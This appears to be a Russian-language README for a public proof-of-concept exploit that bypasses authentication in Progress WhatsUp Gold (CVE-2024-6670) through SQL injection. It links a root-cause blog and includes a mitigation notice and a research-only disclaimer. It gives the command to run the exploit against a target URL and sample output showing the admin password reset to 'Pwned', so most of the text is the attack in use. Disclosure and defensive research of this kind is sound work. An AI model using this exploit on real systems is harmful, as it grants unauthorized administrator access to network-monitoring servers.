
Эксплойт proof-of-concept для обхода аутентификации через SQL-инъекцию в Progress WhatsUp Gold (CVE-2024-6670). Включает анализ первопричины и автоматический сброс пароля для получения доступа администратора.
PoC для уязвимости обхода аутентификации через SQL-инъекцию HasErrors в Progress Software WhatsUp Gold (CVE-2024-6670)
Анализ первопричины уязвимости можно найти в моём блоге:
https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned
Обновитесь до последней версии или примените меры, следуя инструкциям из рекомендаций Progress.
Если бы не мотивация и уроки, которые мой дорогой друг Manish преподал мне за те годы, что я его знаю, я бы не смог эксплуатировать эту уязвимость. Спасибо, друг.
Это программное обеспечение создано исключительно для академических исследований и разработки эффективных методов защиты и не предназначено для использования при атаках на системы, за исключением случаев явного разрешения. Сопровождающие проект не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.